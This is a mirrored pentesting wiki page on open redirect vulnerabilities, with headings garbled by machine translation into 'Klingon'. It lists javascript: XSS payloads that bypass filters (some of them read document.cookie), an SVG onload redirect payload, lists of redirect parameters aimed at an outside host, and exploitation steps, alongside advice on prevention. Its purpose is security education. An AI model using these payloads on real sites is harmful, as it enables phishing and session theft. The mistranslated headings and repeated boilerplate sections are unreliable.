Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/open-redirect.md
Translator workflow b442ae90c4 Translated to Klingon
2024-02-10 17:52:19 +00:00

16 KiB
Raw Permalink Blame History

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Qa'Hom redirect

Qa'Hom to localhost or arbitrary domains

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

Qa'Hom Redirect to XSS

#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//

Open Redirect uploading svg files

Description

An open redirect vulnerability occurs when a web application allows users to redirect to external URLs without proper validation. This can be exploited by an attacker to redirect victims to malicious websites, phishing pages, or to perform other malicious actions.

Exploitation

  1. Identify the vulnerable parameter or functionality that allows URL redirection.
  2. Craft a malicious URL that includes the external URL to which the victim will be redirected.
  3. Upload an SVG file containing the crafted URL to the target application.
  4. Trigger the redirect by accessing the uploaded SVG file.
  5. Verify that the victim is redirected to the specified external URL.

Example

Let's assume that the target application has a functionality that allows users to upload SVG files. The application does not properly validate the URL parameter used for redirection.

  1. Craft a malicious URL that includes the external URL to which the victim will be redirected:
https://target-application.com/redirect?url=https://malicious-website.com

  1. Upload an SVG file containing the crafted URL to the target application.

  2. Access the uploaded SVG file:

https://target-application.com/uploads/malicious.svg
  1. The victim will be redirected to the specified external URL (https://malicious-website.com).

Prevention

To prevent open redirect vulnerabilities when uploading SVG files, follow these recommendations:

  • Implement proper input validation and sanitization for all user-supplied URLs.
  • Whitelist allowed domains or URLs to which redirection is allowed.
  • Avoid using user-supplied input directly in the redirection process.
  • Regularly update and patch the web application to fix any security vulnerabilities.
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>

tlhIngan Hol

QaStaHvIS injection parameters

Open Redirect

An open redirect vulnerability occurs when a web application allows users to redirect to external URLs without proper validation. This can be exploited by an attacker to redirect users to malicious websites or phishing pages.

How to identify open redirect vulnerabilities

To identify open redirect vulnerabilities, you can perform the following steps:

  1. Look for parameters in the URL that control the redirection process, such as redirect, url, next, return, or similar.
  2. Manipulate the value of these parameters by providing a malicious URL as the parameter value.
  3. Check if the application redirects to the provided URL without any validation or restrictions.

Exploiting open redirect vulnerabilities

Once you have identified an open redirect vulnerability, you can exploit it by crafting a malicious URL that redirects the user to a desired location. This can be done by modifying the value of the redirect parameter to point to the attacker-controlled URL.

For example, if the vulnerable parameter is redirect, you can modify the URL as follows:

https://example.com/login?redirect=https://attacker.com/malicious-page

When the user clicks on the link, they will be redirected to the attacker-controlled URL, potentially leading to further exploitation.

Mitigating open redirect vulnerabilities

To mitigate open redirect vulnerabilities, it is important to implement proper validation and restrictions on the redirection process. Here are some best practices:

  1. Whitelist allowed redirect URLs to ensure that only trusted domains are allowed.
  2. Validate the redirect URL to ensure it is a valid and safe destination.
  3. Implement a secure redirect mechanism that prevents arbitrary redirects.

By following these practices, you can significantly reduce the risk of open redirect vulnerabilities in your web application.

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io

Code examples

.Net

using System;
using System.Web;

namespace OpenRedirect
{
    public class Redirect
    {
        public static void Main(string[] args)
        {
            string redirectUrl = "http://www.example.com";
            string redirectParam = "redirectUrl";

            string encodedUrl = HttpUtility.UrlEncode(redirectUrl);
            string redirectPath = $"http://www.example.com/redirect?{redirectParam}={encodedUrl}";

            HttpContext.Current.Response.Redirect(redirectPath);
        }
    }
}

PHP

<?php
$redirectUrl = "http://www.example.com";
$redirectParam = "redirectUrl";

$encodedUrl = urlencode($redirectUrl);
$redirectPath = "http://www.example.com/redirect?" . $redirectParam . "=" . $encodedUrl;

header("Location: " . $redirectPath);
exit;
?>

Python

import urllib.parse

redirect_url = "http://www.example.com"
redirect_param = "redirectUrl"

encoded_url = urllib.parse.quote(redirect_url)
redirect_path = f"http://www.example.com/redirect?{redirect_param}={encoded_url}"

print(f"Location: {redirect_path}")

Ruby

require 'cgi'

redirect_url = "http://www.example.com"
redirect_param = "redirectUrl"

encoded_url = CGI.escape(redirect_url)
redirect_path = "http://www.example.com/redirect?" + redirect_param + "=" + encoded_url

puts "Location: #{redirect_path}"

Java

import java.net.URLEncoder;

public class Redirect {
    public static void main(String[] args) {
        String redirectUrl = "http://www.example.com";
        String redirectParam = "redirectUrl";

        String encodedUrl = URLEncoder.encode(redirectUrl, "UTF-8");
        String redirectPath = "http://www.example.com/redirect?" + redirectParam + "=" + encodedUrl;

        System.out.println("Location: " + redirectPath);
    }
}

response.redirect("~/mysafe-subdomain/login.aspx")

Java

Open Redirect

An open redirect vulnerability occurs when a web application allows users to redirect to external URLs without proper validation. This can be exploited by an attacker to redirect users to malicious websites, phishing pages, or to perform other malicious actions.

To identify and exploit open redirect vulnerabilities in Java web applications, you can follow these steps:

  1. Identify the vulnerable parameter: Look for any user-controllable parameters in the URL or form inputs that are used for redirection.

  2. Test for open redirect: Modify the value of the vulnerable parameter to include an external URL. For example, change the value to https://malicious-website.com and see if the application redirects to that URL.

  3. Exploit the vulnerability: Craft a URL that includes the vulnerable parameter with a malicious URL as its value. Send this URL to the target user and trick them into clicking it. When they click the link, they will be redirected to the malicious website.

Here is an example of a vulnerable Java code snippet that demonstrates an open redirect vulnerability:

String redirectUrl = request.getParameter("redirect");
response.sendRedirect(redirectUrl);

To fix this vulnerability, you should validate and sanitize any user-controllable input used for redirection. Ensure that the URL starts with a trusted domain or whitelist specific domains that are allowed for redirection.

Prevention

To prevent open redirect vulnerabilities in Java web applications, follow these best practices:

  • Validate and sanitize input: Always validate and sanitize any user-controllable input used for redirection. Ensure that the input is a valid URL and restrict it to trusted domains.

  • Use a whitelist approach: Maintain a whitelist of trusted domains that are allowed for redirection. Only redirect to URLs that belong to the whitelist.

  • Implement server-side checks: Perform server-side checks to validate the redirect URL before redirecting the user. This can include checking the URL against a list of known malicious domains or patterns.

  • Educate users: Raise awareness among users about the risks of clicking on untrusted links and provide guidance on how to identify and avoid phishing attempts.

By following these practices, you can mitigate the risk of open redirect vulnerabilities in your Java web applications.

response.redirect("http://mysafedomain.com");

PHP

Open Redirect

An open redirect vulnerability occurs when a web application allows users to redirect to external URLs without proper validation. This can be exploited by an attacker to redirect users to malicious websites, phishing pages, or to perform other malicious actions.

To identify and exploit open redirect vulnerabilities in PHP applications, you can follow these steps:

  1. Identify the vulnerable parameter: Look for any user-controllable parameters in the URL or form inputs that are used for redirection.

  2. Test for open redirect: Modify the value of the vulnerable parameter to include an external URL. For example, if the vulnerable parameter is redirect, you can try appending https://malicious-website.com to the URL.

  3. Observe the redirection: If the application redirects to the provided URL without any validation, it indicates an open redirect vulnerability.

  4. Exploit the vulnerability: Craft a URL that redirects to a malicious website or phishing page. This can be used to trick users into visiting the attacker-controlled site.

To prevent open redirect vulnerabilities in PHP applications, you should:

  • Validate user input: Ensure that any user-controllable parameters used for redirection are properly validated and restricted to trusted domains.

  • Use a whitelist approach: Maintain a whitelist of trusted URLs or domains that the application can redirect to. Reject any redirection attempts to URLs outside the whitelist.

  • Encode and sanitize user input: Apply proper encoding and sanitization techniques to user input to prevent injection attacks and ensure the integrity of redirection URLs.

Remember to always test your applications for open redirect vulnerabilities during the penetration testing phase to ensure the security of your PHP web applications.

<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>

Tools

Resources

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: